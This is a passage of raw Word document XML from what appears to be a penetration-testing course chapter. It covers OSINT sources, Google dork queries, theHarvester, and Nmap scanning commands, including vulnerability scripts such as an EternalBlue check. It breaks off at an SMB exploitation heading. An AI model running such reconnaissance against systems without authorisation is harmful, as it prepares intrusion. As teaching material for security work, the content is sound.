          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OSINT (Open Source Intelligence): Mining public information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Google dorking: Advanced search operators to find sensitive exposed content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">theHarvester: Collects emails, subdomains, and names from public sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shodan: Search engine for internet-connected devices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LinkedIn/social media: Employee names, technologies, org structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS: Domain registration information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Certificate Transparency logs: Discover subdomains via SSL certs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Reconnaissance (direct contact with target):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS enumeration: Finding all subdomains and DNS records</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port scanning: Identifying open ports and services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner grabbing: Getting service version information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Google Dork examples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">site:example.com filetype:pdf          # PDFs on a site</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">site:example.com inurl:admin           # Admin pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">site:example.com "index of"           # Directory listings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"@example.com" filetype:xls           # Spreadsheets with emails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">theHarvester -d example.com -b google,linkedin,dnsdumpster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Scanning &amp; Enumeration with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap (Network Mapper) is the most important reconnaissance tool in existence. Every security professional must master it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Essential Nmap Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Host discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 192.168.1.0/24              # Ping sweep (no port scan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Port scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap 192.168.1.10                    # Basic scan (top 1000 ports)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p- 192.168.1.10                # All 65535 ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p 22,80,443,3389 192.168.1.10  # Specific ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sS 192.168.1.10                # SYN stealth scan (default with sudo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sU 192.168.1.10                # UDP scan (slower)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Service and OS detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV 192.168.1.10                # Service version detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -O 192.168.1.10                 # OS detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A 192.168.1.10                 # Aggressive (OS + version + scripts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vulnerability scanning with NSE scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script vuln 192.168.1.10      # Run all vulnerability scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script smb-vuln-ms17-010 192.168.1.10  # Check for EternalBlue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sC 192.168.1.10                # Run default scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Output formatting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -oN output.txt 192.168.1.10     # Save normal output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -oX output.xml 192.168.1.10     # Save XML (for tools like Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -T4 192.168.1.0/24              # Timing template (1-5, faster = louder)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2E7D32" w:sz="4"/>
              <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:right w:val="single" w:color="2E7D32" w:sz="4"/>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PRO TIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5E9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Always use -oX to save XML output. Metasploit and other tools can import Nmap XML directly, saving you time during exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 SMB Enumeration and Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB (Server Message Block) is the Windows file sharing protocol. It runs on port 445 (and 139 for legacy). It has historically been one of the most vulnerable services in Windows environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
